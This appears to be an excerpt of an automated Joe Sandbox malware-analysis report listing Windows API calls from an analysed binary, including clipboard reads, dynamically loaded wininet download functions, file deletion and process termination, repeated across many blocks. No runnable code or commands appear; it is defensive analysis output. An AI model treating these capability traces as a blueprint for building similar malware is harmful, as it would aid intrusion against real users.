      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00414090: __Stoull.NTSTC_LIBCMT ref: 004140C8
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0046E3C0: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 0046E3E1
      • Part of subcall function 0046E3C0: WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0046E3F6
      • Part of subcall function 0046E3C0: WritePrivateProfileSectionA.KERNEL32(?,?,?), ref: 0046E442
      • Part of subcall function 0046E3C0: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0046E457
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0046E2A0: GetFullPathNameA.KERNEL32 ref: 0046E301
      • Part of subcall function 0046E2A0: GetPrivateProfileStringA.KERNEL32(?,?,ERROR,?,0000FFFF,?), ref: 0046E32B
      • Part of subcall function 0046E2A0: GetPrivateProfileSectionA.KERNEL32(?,?,0000FFFF,?), ref: 0046E36F
      • Part of subcall function 0046E2A0: GetPrivateProfileSectionNamesA.KERNEL32(?,0000FFFF,?), ref: 0046E389
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00434DE0: SendMessageTimeoutA.USER32(00000000,?,00000000,00000000,00000002,00001388,?), ref: 00434F4D
      • Part of subcall function 00434DE0: PostMessageA.USER32(?,?,00000000,00000000), ref: 00434FC0
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043CFD0: mciSendStringA.WINMM(?,00000000,00000000,00000000), ref: 0043D077
      • Part of subcall function 0043CFD0: mciSendStringA.WINMM(?,00000000,00000000,00000000), ref: 0043D0BF
      • Part of subcall function 0043CFD0: mciSendStringA.WINMM(?,00000000,00000000,00000000), ref: 0043D113
      • Part of subcall function 0043CFD0: mciSendStringA.WINMM(close cd wait,00000000,00000000,00000000), ref: 0043D122
      • Part of subcall function 0043CFD0: _strncpy.LIBCMT ref: 0043D14E
      • Part of subcall function 0043CFD0: SetVolumeLabelA.KERNEL32(?,?), ref: 0043D197
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00450930: LoadLibraryA.KERNEL32(wininet), ref: 0045093F
      • Part of subcall function 00450930: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0045098C
      • Part of subcall function 00450930: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 00450998
      • Part of subcall function 00450930: GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 004509A6
      • Part of subcall function 00450930: GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 004509B4
      • Part of subcall function 00450930: GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 004509C0
      • Part of subcall function 00450930: FreeLibrary.KERNEL32(00000000), ref: 00450A5A
      • Part of subcall function 00450930: FreeLibrary.KERNEL32(00000000), ref: 00450A97
      • Part of subcall function 00450930: GetTickCount.KERNEL32 ref: 00450B5F
      • Part of subcall function 00450930: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00450B82
      • Part of subcall function 00450930: GetTickCount.KERNEL32 ref: 00450B98
      • Part of subcall function 00450930: GetTickCount.KERNEL32 ref: 00450BFD
      • Part of subcall function 00450930: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00450C20
      • Part of subcall function 00450930: GetTickCount.KERNEL32 ref: 00450C36
      • Part of subcall function 00450930: FreeLibrary.KERNEL32(00000000), ref: 00450C7D
      • Part of subcall function 00450930: DeleteFileA.KERNEL32(?), ref: 00450C98
      • Part of subcall function 00450930: FreeLibrary.KERNEL32(00000000), ref: 00450CC2
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004350F0: GetCurrentProcessId.KERNEL32 ref: 00435149
      • Part of subcall function 004350F0: OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 00435186
      • Part of subcall function 004350F0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00435195
      • Part of subcall function 004350F0: CloseHandle.KERNEL32(00000000), ref: 0043519E
      • Part of subcall function 004350F0: GetCurrentProcessId.KERNEL32 ref: 00435244
      • Part of subcall function 004350F0: OpenProcess.KERNEL32(00000200,00000000,00000000), ref: 0043525C
      • Part of subcall function 004350F0: SetPriorityClass.KERNEL32(00000000,00008000), ref: 0043526E
      • Part of subcall function 004350F0: GetTickCount.KERNEL32 ref: 004352B7
      • Part of subcall function 004350F0: GetTickCount.KERNEL32 ref: 004352F8
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00435D90: GetClassNameA.USER32(00000000,00000101,00000101), ref: 00435DCA
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00435B80: GetWindowTextLengthA.USER32(00000000), ref: 00435B9B
      • Part of subcall function 00435B80: GetWindowTextA.USER32(00000000,004ABB26,00000001), ref: 00435C17
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
